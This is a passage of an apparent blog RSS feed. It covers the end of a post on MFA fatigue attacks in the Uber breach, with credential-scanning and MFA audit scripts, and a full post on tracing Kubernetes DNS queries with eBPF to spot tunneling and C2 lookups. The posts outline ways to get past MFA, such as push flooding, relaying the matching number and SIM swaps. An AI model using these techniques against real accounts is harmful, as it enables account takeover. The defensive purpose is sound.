<p>The Uber breach succeeded because the attacker found hardcoded credentials on a file share accessible to contractors. The downstream fix after identity:</p>
<pre><code class="" data-line=""># Ensure no scripts or configuration files contain credentials
# Run TruffleHog against your internal repositories and file shares
trufflehog filesystem /path/to/internal/share \
  --json \
  --include-detectors=all \
  2&gt;/dev/null | \
  jq &#039;{file: .SourceMetadata.Data.Filesystem.file, detector: .DetectorName, verified: .Verified}&#039;
</code></pre>
<hr />
<h2 id="run-this-in-your-own-environment-mfa-audit">Run This in Your Own Environment: MFA Audit</h2>
<pre><code class="" data-line="">#!/bin/bash
# Purple Team EP05 — MFA Coverage Audit
# Checks for push-MFA users who are A07 exposure without hardware key enrollment

echo &quot;=== AWS: Console Users Without MFA ===&quot;
aws iam generate-credential-report &gt; /dev/null 2&gt;&amp;1
sleep 5
aws iam get-credential-report --query &#039;Content&#039; --output text | base64 -d | \
  awk -F&#039;,&#039; &#039;NR&gt;1 &amp;&amp; $4==&quot;true&quot; &amp;&amp; $8==&quot;false&quot; {
    print &quot;  USER: &quot; $1 &quot; | Console: &quot; $4 &quot; | MFA: &quot; $8
  }&#039;

echo &quot;&quot;
echo &quot;=== AWS: IAM Users with Long-Lived Access Keys (rotation risk) ===&quot;
aws iam get-credential-report --query &#039;Content&#039; --output text | base64 -d | \
  awk -F&#039;,&#039; &#039;NR&gt;1 &amp;&amp; $9!=&quot;N/A&quot; {
    cmd = &quot;date -d &quot; $10 &quot; +%s&quot;
    cmd | getline key_date; close(cmd)
    now = systime()
    age_days = int((now - key_date) / 86400)
    if (age_days &gt; 90) print &quot;  USER: &quot; $1 &quot; | KEY AGE: &quot; age_days &quot; days&quot;
  }&#039;

echo &quot;&quot;
echo &quot;=== RECOMMENDATION ===&quot;
echo &quot;  - Any console user without MFA = immediate A07 exposure&quot;
echo &quot;  - For accounts with Okta/Azure AD: run IdP-specific audit above&quot;
echo &quot;  - Hardware FIDO2 keys required for all admin accounts&quot;
</code></pre>
<hr />
<h2 id="common-mistakes-when-responding-to-mfa-fatigue-risk"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Mistakes When Responding to MFA Fatigue Risk</h2>
<p><strong>Mandating security training as the primary response.</strong> The Uber contractor was experienced. Training did not fail — the attacker exploited a social engineering vector that training cannot structurally prevent. Hardware keys remove the social engineering surface entirely.</p>
<p><strong>Implementing &#8220;number matching&#8221; and considering MFA fatigue solved.</strong> Number matching makes fatigue attacks harder, not impossible. A sophisticated attacker can relay the number in real time via voice call (&#8220;what number do you see on your screen?&#8221;). It buys time; it does not eliminate the attack class.</p>
<p><strong>Requiring MFA for employees but not contractors.</strong> The Uber breach was a contractor account. Contractor access policies tend to have looser MFA requirements because contractors often resist corporate MDM on personal devices. The solution is to scope contractor access tightly and require hardware key MFA at the access boundary, not push MFA.</p>
<p><strong>Not monitoring for the failure-then-success pattern.</strong> The Okta System Log, Azure AD Sign-in Logs, and Duo Admin Panel all have the data to detect MFA fatigue in real time. Most organizations generate these logs but do not have detection rules for the pattern. The detection is straightforward; the investment is adding the rule to your SIEM.</p>
<p><strong>Forgetting session tokens.</strong> The Okta breach was not MFA fatigue — it was session token theft. An attacker who can steal a valid session token does not need to beat MFA at all. Session token lifetime, storage security, and re-authentication requirements for sensitive operations are separate controls that address this variant.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Attack Variant</th>
<th>Mechanism</th>
<th>Structural Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>Push notification flood</td>
<td>Attacker initiates logins repeatedly until user accepts</td>
<td>FIDO2 hardware key MFA</td>
</tr>
<tr>
<td>Social engineering layer</td>
<td>Attacker contacts user claiming to be IT support</td>
<td>Hardware key (physical presence required)</td>
</tr>
<tr>
<td>Session token theft</td>
<td>Steal valid session without needing MFA at all</td>
<td>Short session lifetime + re-auth for sensitive ops</td>
</tr>
<tr>
<td>Number matching bypass</td>
<td>Relay number via voice call in real time</td>
<td>Hardware key (no relay possible)</td>
</tr>
<tr>
<td>SIM swap</td>
<td>Port victim&#8217;s phone number to attacker&#8217;s SIM; receive OTP</td>
<td>Hardware key (phone-independent)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>An <strong>MFA fatigue attack</strong> exploits push notification UX — training users to tap &#8220;deny&#8221; competes with a trained habit of tapping &#8220;accept&#8221;; hardware keys eliminate the attack surface by requiring physical presence</li>
<li>The Uber breach (2022) was MFA fatigue + hardcoded credentials in a file share — two OWASP categories chained (A07 + A02)</li>
<li>Detection is straightforward: multiple MFA failures followed by a success in a short window — this pattern exists in every IdP&#8217;s logs; adding the detection rule is the work</li>
<li>Number matching is a meaningful intermediate mitigation; it is not a structural fix</li>
<li>Hardware FIDO2 keys are the structural fix — they require physical presence and are phishing-resistant by design</li>
<li>Tier-0 accounts (cloud admin, IAM admin, Okta admin) cannot wait for the phased rollout — hardware keys on day one</li>
<li>Session token theft (CircleCI, Okta support breach) is a related A07 variant: even perfect MFA is bypassed if a valid session token is exfiltrated</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP06 covers CI/CD secrets exposure — how pipeline breaches work, why storing credentials in environment variables is structurally dangerous, and how the CircleCI breach exposed secrets that teams thought were safely stored. The structural answer is OIDC workload identity (IAM EP07): short-lived credentials that cannot be exfiltrated because they don&#8217;t exist until the moment they&#8217;re needed.</p>
<p>Get EP06 in your inbox when it publishes → <a href="#subscribe">subscribe at linuxcent.com</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&amp;linkname=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fmfa-fatigue-attack-uber-okta%2F&#038;title=MFA%20Fatigue%20Attacks%3A%20How%20Uber%20Got%20Breached%20and%20How%20to%20Stop%20It" data-a2a-url="https://linuxcent.com/mfa-fatigue-attack-uber-okta/" data-a2a-title="MFA Fatigue Attacks: How Uber Got Breached and How to Stop It"></a></p><p>The post <a href="https://linuxcent.com/mfa-fatigue-attack-uber-okta/">MFA Fatigue Attacks: How Uber Got Breached and How to Stop It</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/mfa-fatigue-attack-uber-okta/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1855</post-id>	</item>
		<item>
		<title>DNS at the Kernel Level — What Your Pods Are Actually Resolving</title>
		<link>https://linuxcent.com/ebpf-dns-observability-kubernetes/</link>
					<comments>https://linuxcent.com/ebpf-dns-observability-kubernetes/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sat, 06 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[CoreDNS]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Observability]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[Tracing]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1840</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Trace every DNS query your pods make — in real time at the kernel level — using eBPF tracepoints. No sidecar, no restart, no sampling. Visibility CoreDNS metrics can't give you.</p>
<p>The post <a href="https://linuxcent.com/ebpf-dns-observability-kubernetes/">DNS at the Kernel Level — What Your Pods Are Actually Resolving</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 11</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <strong>DNS Observability</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img decoding="async" width="2392" height="2560" src="https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-scaled.png" alt="eBPF DNS Kernel Observability — kernel-level DNS event capture without touching application code" class="wp-image-2120" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-scaled.png 2392w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-280x300.png 280w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-957x1024.png 957w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-768x822.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-1435x1536.png 1435w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-1913x2048.png 1913w" sizes="(max-width: 2392px) 100vw, 2392px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">eBPF intercepts DNS at the kernel socket layer — capturing query, response, and latency without application changes.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>DNS observability in Kubernetes with eBPF hooks the kernel&#8217;s DNS syscall path — giving you per-pod query visibility without sidecars, restarts, or CoreDNS log scraping<br />
  <em>(tracepoint = a stable, versioned hook placed deliberately in the Linux kernel source; unlike kprobes, tracepoints survive kernel upgrades without breakage)</em></li>
<li>CoreDNS metrics tell you aggregate query rates; eBPF tracepoints tell you which pod queried what domain, when, and what was returned</li>
<li>A compromised workload&#8217;s first observable action is almost always an unexpected DNS query — infrastructure no legitimate process should ever resolve</li>
<li>The DNS syscall path in Linux goes: application calls <code class="" data-line="">getaddrinfo()</code> → glibc → <code class="" data-line="">sendto()</code> syscall → kernel network stack → UDP packet to CoreDNS resolver</li>
<li>You hook the <code class="" data-line="">sendto</code> tracepoint to catch the query leaving the pod and the <code class="" data-line="">recvfrom</code> tracepoint to catch the response arriving</li>
<li>Production note: DNS query payloads cross the kernel as raw UDP — parsing the DNS wire format in a bpftrace one-liner requires reading past the UDP header; Tetragon and Pixie do this parsing in the eBPF program itself</li>
</ul>
<hr />
<p>EP10 showed eBPF flow telemetry as the ground truth for what connections your pods are making. DNS observability with eBPF goes one layer beneath that: the name resolution step that happens before any connection is established. Every domain a pod resolves is visible at the kernel level. That visibility is what a security scan alert is missing when it flags &#8220;unexpected DNS queries&#8221; — it can see the traffic on the wire, but it can&#8217;t tell you which pod sent it without restarting or deploying an agent into the pod.</p>
<h2 id="quick-check-what-dns-traffic-is-leaving-your-pods-right-now">Quick Check: What DNS Traffic Is Leaving Your Pods Right Now?</h2>
<p>Without installing anything, you can see DNS queries crossing any node in under 30 seconds:</p>
<pre><code class="" data-line=""># SSH into a worker node, then:

# Watch all UDP port 53 traffic — which processes are making DNS queries?
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[3] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[2];
    if ($port == 53) {
        printf(&quot;%-20s %-6d DNS query (UDP sendto)\n&quot;, comm, pid);
    }
}&#039; --timeout 30
</code></pre>
<p>Expected output:</p>
<pre><code class="" data-line="">coredns              1842   DNS query (UDP sendto)   # ← CoreDNS forwarding upstream
nginx                9231   DNS query (UDP sendto)   # ← nginx resolving upstream
payment-svc          11043  DNS query (UDP sendto)   # ← your service making queries
curl                 14829  DNS query (UDP sendto)   # ← kubectl exec / debug session
</code></pre>
<pre><code class="" data-line=""># How many DNS queries per process in the last 30 seconds?
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[3] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[2];
    if ($port == 53) { @dns_queries[comm] = count(); }
}
interval:s:30 { print(@dns_queries); exit(); }
&#039;
</code></pre>
<p>Expected output:</p>
<pre><code class="" data-line="">@dns_queries[coredns]:       1203   # ← upstream forwarder traffic
@dns_queries[payment-svc]:    847   # ← legitimate service queries
@dns_queries[unknown]:         12   # ← investigate this one
</code></pre>
<blockquote>
<p><strong>On EKS or GKE managed nodes:</strong> You may not be able to SSH directly to worker nodes, but you can run a privileged debug pod: <code class="" data-line="">kubectl debug node/&lt;node-name&gt; -it --image=quay.io/iovisor/bpftrace</code>. The bpftrace program runs on the host kernel and sees all pods&#8217; DNS queries. GKE Autopilot restricts privileged pods — use GKE&#8217;s built-in eBPF-based DNS observability instead (enabled via Cloud Logging with DNS policy logging).</p>
</blockquote>
<hr />
<p>A security scan flagged unexpected DNS queries from <code class="" data-line="">payment-svc</code> in the production namespace. The query domains didn&#8217;t match anything in the service&#8217;s known dependency list. The scan tool showed the traffic on the wire — destination port 53, from the pod&#8217;s IP — but couldn&#8217;t tell us which process inside the pod was responsible or what domain was being queried without pulling the pod&#8217;s DNS logs.</p>
<p>The pod had no DNS logging enabled. CoreDNS showed the queries in its aggregate metrics but with no attribution below namespace level. Restarting the pod to add a DNS sidecar would wipe any in-memory state the process had accumulated.</p>
<p>I ran bpftrace with a <code class="" data-line="">recvfrom</code> hook to catch the DNS response payloads coming back into the pod:</p>
<pre><code class="" data-line="">bpftrace -e &#039;
tracepoint:syscalls:sys_exit_recvfrom {
    if (retval &gt; 0) {
        printf(&quot;%-20s PID %-6d received %d bytes (possible DNS response)\n&quot;,
               comm, pid, retval);
    }
}&#039; --timeout 60
</code></pre>
<p>Then cross-referenced the PIDs to container processes via <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code>. The unexpected queries were coming from a sidecar process that had been injected by a recent Helm chart change — not from the main application container at all. A misconfigured Datadog agent injected into the wrong namespace was querying its intake endpoint.</p>
<p>No restart. No sidecar deployment. Found in under two minutes.</p>
<hr />
<h2 id="why-coredns-metrics-dont-give-you-this">Why CoreDNS Metrics Don&#8217;t Give You This</h2>
<p>CoreDNS exposes DNS query metrics via Prometheus. Those metrics tell you:<br />
&#8211; Total queries per second across the cluster<br />
&#8211; Query latency histograms<br />
&#8211; Error rates (NXDOMAIN, SERVFAIL)<br />
&#8211; Upstream forwarder health</p>
<p>What they don&#8217;t tell you:<br />
&#8211; Which specific pod sent a query to a specific domain<br />
&#8211; Which process inside that pod made the <code class="" data-line="">getaddrinfo()</code> call<br />
&#8211; Whether the query came from the main container or an injected sidecar<br />
&#8211; The timing relationship between a DNS query and the connection that followed it</p>
<p>CoreDNS sees the query after it arrives at the resolver. eBPF tracepoints see the query at the moment the pod&#8217;s process issues the <code class="" data-line="">sendto()</code> syscall — before it leaves the node. The difference is attribution.</p>
<hr />
<h2 id="the-dns-syscall-path-in-linux">The DNS Syscall Path in Linux</h2>
<p>Understanding where the hook fires helps you reason about what you can observe:</p>
<pre><code class="" data-line="">Application code
    ↓
getaddrinfo(&quot;api.example.com&quot;) ← glibc resolver function
    ↓
glibc reads /etc/resolv.conf → finds nameserver 10.96.0.10 (CoreDNS ClusterIP)
    ↓
glibc builds DNS wire-format query packet
    ↓
sendto(sockfd, buf, len, 0, &amp;resolver_addr, addrlen)
    ↓                     ← eBPF tracepoint fires here: sys_enter_sendto
Linux kernel: udp_sendmsg()
    ↓
Packet leaves pod veth interface
    ↓
TC eBPF on veth sees UDP packet (flow telemetry picks this up too)
    ↓
CoreDNS receives query, resolves, sends response
    ↓
Packet arrives back at pod veth
    ↓
recvfrom(sockfd, buf, len, 0, &amp;src_addr, &amp;src_len)
    ↓                     ← eBPF tracepoint fires here: sys_exit_recvfrom
glibc parses DNS response
    ↓
getaddrinfo() returns IP addresses to application
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">getaddrinfo</code></strong> — the standard POSIX function applications call to resolve a hostname to IP addresses. It lives in glibc, not in the kernel. The kernel never sees the domain name string directly — it only sees the UDP packet carrying the DNS wire-format query. To read the actual domain name in an eBPF program, you parse the DNS packet payload at the <code class="" data-line="">sendto</code> tracepoint.</p>
<p><strong><code class="" data-line="">tracepoint</code></strong> — a stable, versioned hook deliberately placed in Linux kernel source code by kernel developers. Unlike kprobes (which attach to arbitrary kernel functions and break when those functions change), tracepoints are part of the kernel&#8217;s stable interface. The <code class="" data-line="">syscalls:sys_enter_sendto</code> tracepoint has been present and stable since kernel 3.x. You can rely on it across Ubuntu 20.04 through the latest kernels without version checks.</p>
</blockquote>
<hr />
<h2 id="reading-dns-queries-at-the-tracepoint">Reading DNS Queries at the Tracepoint</h2>
<p>The <code class="" data-line="">sendto</code> tracepoint fires when any process sends data on a socket. Filtering to port 53 gives you DNS queries. Parsing the payload gives you the domain name.</p>
<p>The DNS wire format for a query:</p>
<pre><code class="" data-line="">Bytes 0-11:   DNS header (12 bytes)
              - Transaction ID (2 bytes)
              - Flags (2 bytes)
              - QDCount, ANCount, NSCount, ARCount (2 bytes each)
Byte 12+:     Question section
              - QNAME (variable length, label-encoded)
              - QTYPE (2 bytes)
              - QCLASS (2 bytes)
</code></pre>
<p>The QNAME is length-prefixed labels: <code class="" data-line="">\x03api\x07example\x03com\x00</code> for <code class="" data-line="">api.example.com</code>. bpftrace can read the raw bytes but parsing label encoding inline in a one-liner is awkward. For raw query detection (flag any DNS query from a specific process), the tracepoint is enough:</p>
<pre><code class="" data-line=""># Watch DNS queries from a specific process name — replace &quot;payment-svc&quot;
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto /comm == &quot;payment-svc&quot;/ {
    printf(&quot;PID %-6d sending %d bytes to DNS\n&quot;, pid, args-&gt;len);
}
&#039;
</code></pre>
<p>For full domain name extraction, use a tool that implements DNS wire-format parsing in its eBPF layer. Tetragon and Pixie both do this. On a Tetragon-instrumented cluster:</p>
<pre><code class="" data-line=""># Watch DNS queries with domain names — Tetragon (all pods)
kubectl exec -n kube-system -it $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE \
  | grep -i dns
</code></pre>
<p>Sample Tetragon output:</p>
<pre><code class="" data-line="">{
  &quot;process&quot;: {
    &quot;pod&quot;: {&quot;name&quot;: &quot;payment-svc-7d4b9f-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
    &quot;binary&quot;: &quot;/usr/bin/payment-service&quot;,
    &quot;pid&quot;: 11043
  },
  &quot;function_name&quot;: &quot;__sys_sendto&quot;,
  &quot;args&quot;: [
    {&quot;sock_arg&quot;: {&quot;family&quot;: &quot;AF_INET&quot;, &quot;protocol&quot;: &quot;UDP&quot;,
                  &quot;daddr&quot;: &quot;10.96.0.10&quot;, &quot;dport&quot;: 53}},
    {&quot;bytes_arg&quot;: &quot;&lt;DNS query for metrics.datadoghq.com&gt;&quot;}
  ]
}
</code></pre>
<p>Pod name, namespace, binary, PID, and the domain being queried — all from a kernel tracepoint, no sidecar, no pod restart.</p>
<hr />
<h2 id="building-pod-level-dns-attribution-without-tetragon">Building Pod-Level DNS Attribution Without Tetragon</h2>
<p>If you&#8217;re not running Tetragon, you can build pod-level attribution from the PID. When bpftrace reports a PID making a DNS query, map it to a container:</p>
<pre><code class="" data-line=""># Get the PID from bpftrace, then:
PID=11043

# Which cgroup does this PID belong to? (maps to container/pod)
cat /proc/$PID/cgroup | grep kubepods
# 12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/a4c8f1e2b3d4...
# The pod UID is embedded: pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12

# Map pod UID to pod name
kubectl get pods -A -o jsonpath=&#039;{range .items[*]}{.metadata.uid}{&quot; &quot;}{.metadata.name}{&quot; &quot;}{.metadata.namespace}{&quot;\n&quot;}{end}&#039; \
  | grep 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12  payment-svc-7d4b9f-xk2p1  production
</code></pre>
<p>That&#8217;s the full chain: kernel tracepoint → host PID → cgroup path → pod UID → pod name + namespace. Automatable. No agents required inside the pod.</p>
<hr />
<h2 id="detecting-anomalous-dns-what-to-watch-for">Detecting Anomalous DNS: What to Watch For</h2>
<p>DNS is the first observable action in most attack chains. A process that has been compromised or injected typically cannot establish a C2 connection without first resolving the C2 domain.</p>
<p>Signals worth watching at the kernel DNS layer:</p>
<p><strong>Queries to non-cluster domains from unexpected processes</strong></p>
<pre><code class="" data-line=""># Flag any DNS query to a non-cluster domain (not .cluster.local or .svc.cluster.local)
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[3] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[2];
    if ($port == 53) {
        printf(&quot;%-20s %-6d DNS sendto\n&quot;, comm, pid);
    }
}&#039; --timeout 60
</code></pre>
<p><strong>High-frequency DNS queries from a single process</strong> (DNS tunneling fingerprint)</p>
<pre><code class="" data-line=""># Processes making more than N DNS queries per second
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[3] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[2];
    if ($port == 53) { @[pid, comm] = count(); }
}
interval:s:1 {
    print(@);
    clear(@);
}
&#039;
</code></pre>
<p>DNS tunneling exfiltrates data by encoding it in subdomains of queries. A process making 50+ DNS queries per second to varied subdomains of the same parent domain is a strong signal. CoreDNS aggregate metrics will show elevated query volume; the kernel tracepoint tells you which PID is responsible.</p>
<p><strong>Queries immediately followed by a connection</strong> (normal vs anomalous pattern)</p>
<p>Legitimate services resolve a known set of domains. A process that resolves a new, never-before-seen domain and immediately opens a TCP connection to the returned IP is structurally different from normal service behavior. The combination of DNS tracepoint + TCP connect kprobe lets you correlate these events by PID and timestamp — without any application instrumentation.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>DNS payload parsing is not trivial in bpftrace.</strong> Reading the domain name from the UDP payload requires byte-level parsing of the DNS wire format inside an eBPF program. bpftrace can read raw bytes with <code class="" data-line="">buf()</code>, but the label-encoded domain name format requires a loop that the verifier may reject for complexity reasons. Tools like Tetragon and Pixie implement this parsing in C within their eBPF programs where they have more control over verifier limits. For raw detection (flag DNS queries from unexpected processes), the sendto tracepoint without payload parsing is enough.</p>
<p><strong><code class="" data-line="">sendto</code> fires for all UDP, not just DNS.</strong> Filter on the destination port. The destination address structure is at <code class="" data-line="">args-&gt;addr</code> — port is in network byte order at bytes 2–3 of the <code class="" data-line="">sockaddr_in</code> structure. The filtering in the examples above is correct for port 53; double-check if you&#8217;re on a cluster that uses a non-standard DNS port.</p>
<p><strong>CoreDNS pods will appear in your DNS query trace — that&#8217;s expected.</strong> CoreDNS makes upstream DNS queries to resolve non-cluster domains. Filter on namespace/cgroup if you want to exclude CoreDNS from your trace.</p>
